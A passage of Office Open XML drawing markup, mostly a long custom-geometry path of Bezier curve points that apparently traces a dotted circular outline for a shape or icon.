                <a:gd name="T106" fmla="*/ 1628 w 2138"/>
                <a:gd name="T107" fmla="*/ 1970 h 2137"/>
                <a:gd name="T108" fmla="*/ 1715 w 2138"/>
                <a:gd name="T109" fmla="*/ 1920 h 2137"/>
                <a:gd name="T110" fmla="*/ 1815 w 2138"/>
                <a:gd name="T111" fmla="*/ 1822 h 2137"/>
                <a:gd name="T112" fmla="*/ 1875 w 2138"/>
                <a:gd name="T113" fmla="*/ 1764 h 2137"/>
                <a:gd name="T114" fmla="*/ 1931 w 2138"/>
                <a:gd name="T115" fmla="*/ 1686 h 2137"/>
                <a:gd name="T116" fmla="*/ 1986 w 2138"/>
                <a:gd name="T117" fmla="*/ 1602 h 2137"/>
                <a:gd name="T118" fmla="*/ 2039 w 2138"/>
                <a:gd name="T119" fmla="*/ 1517 h 2137"/>
                <a:gd name="T120" fmla="*/ 2076 w 2138"/>
                <a:gd name="T121" fmla="*/ 1402 h 2137"/>
                <a:gd name="T122" fmla="*/ 2103 w 2138"/>
                <a:gd name="T123" fmla="*/ 1306 h 2137"/>
                <a:gd name="T124" fmla="*/ 2131 w 2138"/>
                <a:gd name="T125" fmla="*/ 1189 h 2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38" h="2137">
                  <a:moveTo>
                    <a:pt x="2130" y="1067"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1067"/>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1075"/>
                    <a:pt x="2130" y="1082"/>
                    <a:pt x="2130" y="1088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1090"/>
                    <a:pt x="2131" y="1092"/>
                    <a:pt x="2133" y="1092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1092"/>
                    <a:pt x="2137" y="1091"/>
                    <a:pt x="2138" y="1088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1082"/>
                    <a:pt x="2138" y="1075"/>
                    <a:pt x="2138" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1067"/>
                    <a:pt x="2138" y="1067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1064"/>
                    <a:pt x="2136" y="1063"/>
                    <a:pt x="2134" y="1063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1063"/>
                    <a:pt x="2130" y="1064"/>
                    <a:pt x="2130" y="1067"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1027"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1033"/>
                    <a:pt x="2129" y="1040"/>
                    <a:pt x="2129" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1049"/>
                    <a:pt x="2131" y="1051"/>
                    <a:pt x="2134" y="1051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1051"/>
                    <a:pt x="2138" y="1049"/>
                    <a:pt x="2137" y="1046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1040"/>
                    <a:pt x="2137" y="1033"/>
                    <a:pt x="2137" y="1026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1024"/>
                    <a:pt x="2135" y="1022"/>
                    <a:pt x="2133" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1023"/>
                    <a:pt x="2129" y="1025"/>
                    <a:pt x="2129" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1027"/>
                    <a:pt x="2129" y="1027"/>
                    <a:pt x="2129" y="1027"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="987"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="994"/>
                    <a:pt x="2128" y="1000"/>
                    <a:pt x="2128" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1009"/>
                    <a:pt x="2130" y="1011"/>
                    <a:pt x="2132" y="1011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1010"/>
                    <a:pt x="2136" y="1009"/>
                    <a:pt x="2136" y="1006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1000"/>
                    <a:pt x="2135" y="993"/>
                    <a:pt x="2135" y="986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="984"/>
                    <a:pt x="2133" y="982"/>
                    <a:pt x="2130" y="983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="983"/>
                    <a:pt x="2126" y="985"/>
                    <a:pt x="2127" y="987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="987"/>
                    <a:pt x="2127" y="987"/>
                    <a:pt x="2127" y="987"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="947"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="954"/>
                    <a:pt x="2124" y="960"/>
                    <a:pt x="2125" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="969"/>
                    <a:pt x="2127" y="971"/>
                    <a:pt x="2129" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="970"/>
                    <a:pt x="2133" y="968"/>
                    <a:pt x="2133" y="966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="960"/>
                    <a:pt x="2132" y="953"/>
                    <a:pt x="2131" y="946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="944"/>
                    <a:pt x="2129" y="942"/>
                    <a:pt x="2126" y="943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="943"/>
                    <a:pt x="2123" y="945"/>
                    <a:pt x="2123" y="947"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="947"/>
                    <a:pt x="2123" y="947"/>
                    <a:pt x="2123" y="947"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="908"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="914"/>
                    <a:pt x="2120" y="921"/>
                    <a:pt x="2120" y="927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="930"/>
                    <a:pt x="2123" y="931"/>
                    <a:pt x="2125" y="931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="931"/>
                    <a:pt x="2129" y="929"/>
                    <a:pt x="2128" y="926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="920"/>
                    <a:pt x="2127" y="913"/>
                    <a:pt x="2126" y="906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="904"/>
                    <a:pt x="2123" y="903"/>
                    <a:pt x="2121" y="903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="903"/>
                    <a:pt x="2117" y="905"/>
                    <a:pt x="2118" y="908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="908"/>
                    <a:pt x="2118" y="908"/>
                    <a:pt x="2118" y="908"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="868"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="875"/>
                    <a:pt x="2113" y="881"/>
                    <a:pt x="2114" y="888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2115" y="890"/>
                    <a:pt x="2117" y="892"/>
                    <a:pt x="2119" y="891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="891"/>
                    <a:pt x="2123" y="889"/>
                    <a:pt x="2122" y="887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="880"/>
                    <a:pt x="2120" y="873"/>
                    <a:pt x="2119" y="867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="865"/>
                    <a:pt x="2116" y="863"/>
                    <a:pt x="2114" y="864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="864"/>
                    <a:pt x="2110" y="866"/>
                    <a:pt x="2111" y="868"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="829"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="836"/>
                    <a:pt x="2106" y="842"/>
                    <a:pt x="2107" y="849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="851"/>
                    <a:pt x="2110" y="852"/>
                    <a:pt x="2112" y="852"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="851"/>
                    <a:pt x="2115" y="849"/>
                    <a:pt x="2115" y="847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="841"/>
                    <a:pt x="2112" y="834"/>
                    <a:pt x="2110" y="827"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="825"/>
                    <a:pt x="2108" y="824"/>
                    <a:pt x="2106" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="825"/>
                    <a:pt x="2102" y="827"/>
                    <a:pt x="2103" y="829"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="791"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="797"/>
                    <a:pt x="2096" y="803"/>
                    <a:pt x="2098" y="810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2099" y="812"/>
                    <a:pt x="2101" y="813"/>
                    <a:pt x="2103" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2105" y="812"/>
                    <a:pt x="2106" y="810"/>
                    <a:pt x="2106" y="808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="801"/>
                    <a:pt x="2102" y="795"/>
                    <a:pt x="2101" y="788"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100" y="786"/>
                    <a:pt x="2098" y="785"/>
                    <a:pt x="2096" y="786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="786"/>
                    <a:pt x="2092" y="788"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="791"/>
                    <a:pt x="2093" y="791"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="752"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="759"/>
                    <a:pt x="2086" y="765"/>
                    <a:pt x="2088" y="771"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2088" y="773"/>
                    <a:pt x="2090" y="775"/>
                    <a:pt x="2093" y="774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="773"/>
                    <a:pt x="2096" y="771"/>
                    <a:pt x="2095" y="769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="763"/>
                    <a:pt x="2091" y="756"/>
                    <a:pt x="2089" y="750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2089" y="748"/>
                    <a:pt x="2087" y="747"/>
                    <a:pt x="2084" y="747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="748"/>
                    <a:pt x="2081" y="750"/>
                    <a:pt x="2082" y="752"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="752"/>
                    <a:pt x="2082" y="752"/>
                    <a:pt x="2082" y="752"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2069" y="714"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2071" y="721"/>
                    <a:pt x="2074" y="727"/>
                    <a:pt x="2076" y="733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="735"/>
                    <a:pt x="2079" y="736"/>
                    <a:pt x="2081" y="736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="735"/>
                    <a:pt x="2084" y="733"/>
                    <a:pt x="2083" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="724"/>
                    <a:pt x="2079" y="718"/>
                    <a:pt x="2077" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="710"/>
                    <a:pt x="2074" y="709"/>
                    <a:pt x="2072" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="710"/>
                    <a:pt x="2069" y="712"/>
                    <a:pt x="2069" y="714"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2055" y="677"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="683"/>
                    <a:pt x="2060" y="689"/>
                    <a:pt x="2062" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2063" y="698"/>
                    <a:pt x="2065" y="699"/>
                    <a:pt x="2068" y="698"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="697"/>
                    <a:pt x="2071" y="695"/>
                    <a:pt x="2070" y="693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="687"/>
                    <a:pt x="2065" y="680"/>
                    <a:pt x="2063" y="674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="672"/>
                    <a:pt x="2060" y="671"/>
                    <a:pt x="2057" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="673"/>
                    <a:pt x="2054" y="675"/>
                    <a:pt x="2055" y="677"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="640"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2043" y="646"/>
                    <a:pt x="2045" y="652"/>
                    <a:pt x="2048" y="659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2049" y="661"/>
                    <a:pt x="2051" y="662"/>
                    <a:pt x="2053" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="660"/>
                    <a:pt x="2056" y="658"/>
                    <a:pt x="2055" y="656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="649"/>
                    <a:pt x="2050" y="643"/>
                    <a:pt x="2047" y="637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046" y="635"/>
                    <a:pt x="2044" y="634"/>
                    <a:pt x="2042" y="635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="636"/>
                    <a:pt x="2039" y="638"/>
                    <a:pt x="2040" y="640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="640"/>
                    <a:pt x="2040" y="640"/>
                    <a:pt x="2040" y="640"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="604"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2026" y="610"/>
                    <a:pt x="2029" y="616"/>
                    <a:pt x="2032" y="622"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2033" y="624"/>
                    <a:pt x="2035" y="625"/>
                    <a:pt x="2037" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2039" y="623"/>
                    <a:pt x="2040" y="621"/>
                    <a:pt x="2039" y="619"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="613"/>
                    <a:pt x="2033" y="607"/>
                    <a:pt x="2030" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2029" y="599"/>
                    <a:pt x="2027" y="598"/>
                    <a:pt x="2025" y="599"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="600"/>
                    <a:pt x="2022" y="602"/>
                    <a:pt x="2023" y="604"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="569"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2008" y="575"/>
                    <a:pt x="2011" y="581"/>
                    <a:pt x="2014" y="586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2015" y="588"/>
                    <a:pt x="2018" y="589"/>
                    <a:pt x="2020" y="588"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="587"/>
                    <a:pt x="2022" y="585"/>
                    <a:pt x="2021" y="583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="577"/>
                    <a:pt x="2015" y="571"/>
                    <a:pt x="2012" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2011" y="563"/>
                    <a:pt x="2009" y="562"/>
                    <a:pt x="2007" y="563"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="564"/>
                    <a:pt x="2004" y="567"/>
                    <a:pt x="2005" y="569"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="534"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="540"/>
                    <a:pt x="1992" y="546"/>
                    <a:pt x="1995" y="551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1997" y="553"/>
                    <a:pt x="1999" y="554"/>
                    <a:pt x="2001" y="553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2003" y="552"/>
                    <a:pt x="2004" y="549"/>
                    <a:pt x="2002" y="547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="542"/>
                    <a:pt x="1996" y="536"/>
                    <a:pt x="1993" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1991" y="528"/>
                    <a:pt x="1989" y="528"/>
                    <a:pt x="1987" y="529"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1985" y="530"/>
                    <a:pt x="1984" y="532"/>
                    <a:pt x="1986" y="534"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="500"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1968" y="506"/>
                    <a:pt x="1972" y="511"/>
                    <a:pt x="1975" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1977" y="519"/>
                    <a:pt x="1979" y="519"/>
                    <a:pt x="1981" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1983" y="517"/>
                    <a:pt x="1983" y="515"/>
                    <a:pt x="1982" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="507"/>
                    <a:pt x="1975" y="501"/>
                    <a:pt x="1972" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1970" y="494"/>
                    <a:pt x="1968" y="493"/>
                    <a:pt x="1966" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1964" y="496"/>
                    <a:pt x="1964" y="498"/>
                    <a:pt x="1965" y="500"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="467"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="472"/>
                    <a:pt x="1950" y="478"/>
                    <a:pt x="1954" y="483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1955" y="485"/>
                    <a:pt x="1958" y="486"/>
                    <a:pt x="1960" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="483"/>
                    <a:pt x="1962" y="481"/>
                    <a:pt x="1961" y="479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="473"/>
                    <a:pt x="1953" y="468"/>
                    <a:pt x="1949" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1948" y="461"/>
                    <a:pt x="1946" y="460"/>
                    <a:pt x="1944" y="461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="463"/>
                    <a:pt x="1942" y="465"/>
                    <a:pt x="1943" y="467"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="435"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="440"/>
                    <a:pt x="1928" y="445"/>
                    <a:pt x="1931" y="451"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1933" y="452"/>
                    <a:pt x="1935" y="453"/>
                    <a:pt x="1937" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="450"/>
                    <a:pt x="1939" y="448"/>
                    <a:pt x="1938" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="440"/>
                    <a:pt x="1930" y="435"/>
                    <a:pt x="1926" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1925" y="428"/>
                    <a:pt x="1922" y="428"/>
                    <a:pt x="1920" y="429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1919" y="430"/>
                    <a:pt x="1918" y="433"/>
                    <a:pt x="1920" y="435"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="403"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="408"/>
                    <a:pt x="1904" y="413"/>
                    <a:pt x="1908" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1909" y="420"/>
                    <a:pt x="1911" y="421"/>
                    <a:pt x="1913" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1915" y="418"/>
                    <a:pt x="1915" y="415"/>
                    <a:pt x="1914" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="408"/>
                    <a:pt x="1906" y="403"/>
                    <a:pt x="1901" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="396"/>
                    <a:pt x="1898" y="396"/>
                    <a:pt x="1896" y="397"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1894" y="399"/>
                    <a:pt x="1894" y="401"/>
                    <a:pt x="1895" y="403"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="372"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="377"/>
                    <a:pt x="1878" y="383"/>
                    <a:pt x="1883" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="389"/>
                    <a:pt x="1887" y="390"/>
                    <a:pt x="1888" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1890" y="387"/>
                    <a:pt x="1890" y="384"/>
                    <a:pt x="1889" y="382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="377"/>
                    <a:pt x="1880" y="372"/>
                    <a:pt x="1876" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="366"/>
                    <a:pt x="1872" y="365"/>
                    <a:pt x="1870" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1868" y="368"/>
                    <a:pt x="1868" y="371"/>
                    <a:pt x="1870" y="372"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="343"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="348"/>
                    <a:pt x="1852" y="353"/>
                    <a:pt x="1856" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="359"/>
                    <a:pt x="1860" y="359"/>
                    <a:pt x="1862" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1864" y="356"/>
                    <a:pt x="1864" y="354"/>
                    <a:pt x="1862" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="347"/>
                    <a:pt x="1853" y="342"/>
                    <a:pt x="1849" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="336"/>
                    <a:pt x="1845" y="336"/>
                    <a:pt x="1843" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1841" y="339"/>
                    <a:pt x="1841" y="341"/>
                    <a:pt x="1843" y="343"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="314"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1820" y="319"/>
                    <a:pt x="1824" y="324"/>
                    <a:pt x="1829" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="330"/>
                    <a:pt x="1833" y="330"/>
                    <a:pt x="1835" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="327"/>
                    <a:pt x="1836" y="324"/>
                    <a:pt x="1835" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="318"/>
                    <a:pt x="1825" y="313"/>
                    <a:pt x="1821" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="307"/>
                    <a:pt x="1817" y="307"/>
                    <a:pt x="1815" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1813" y="310"/>
                    <a:pt x="1814" y="313"/>
                    <a:pt x="1815" y="314"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="287"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1791" y="291"/>
                    <a:pt x="1796" y="296"/>
                    <a:pt x="1801" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="302"/>
                    <a:pt x="1805" y="302"/>
                    <a:pt x="1806" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="299"/>
                    <a:pt x="1808" y="296"/>
                    <a:pt x="1806" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1801" y="290"/>
                    <a:pt x="1797" y="285"/>
                    <a:pt x="1792" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="279"/>
                    <a:pt x="1787" y="279"/>
                    <a:pt x="1786" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1784" y="283"/>
                    <a:pt x="1785" y="285"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="287"/>
                    <a:pt x="1786" y="287"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="260"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1761" y="265"/>
                    <a:pt x="1766" y="269"/>
                    <a:pt x="1771" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1773" y="275"/>
                    <a:pt x="1776" y="275"/>
                    <a:pt x="1777" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1778" y="271"/>
                    <a:pt x="1778" y="269"/>
                    <a:pt x="1777" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="263"/>
                    <a:pt x="1767" y="259"/>
                    <a:pt x="1761" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="253"/>
                    <a:pt x="1757" y="253"/>
                    <a:pt x="1756" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1754" y="256"/>
                    <a:pt x="1755" y="259"/>
                    <a:pt x="1756" y="260"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="235"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1731" y="239"/>
                    <a:pt x="1736" y="243"/>
                    <a:pt x="1741" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1743" y="249"/>
                    <a:pt x="1745" y="249"/>
                    <a:pt x="1747" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1748" y="245"/>
                    <a:pt x="1748" y="243"/>
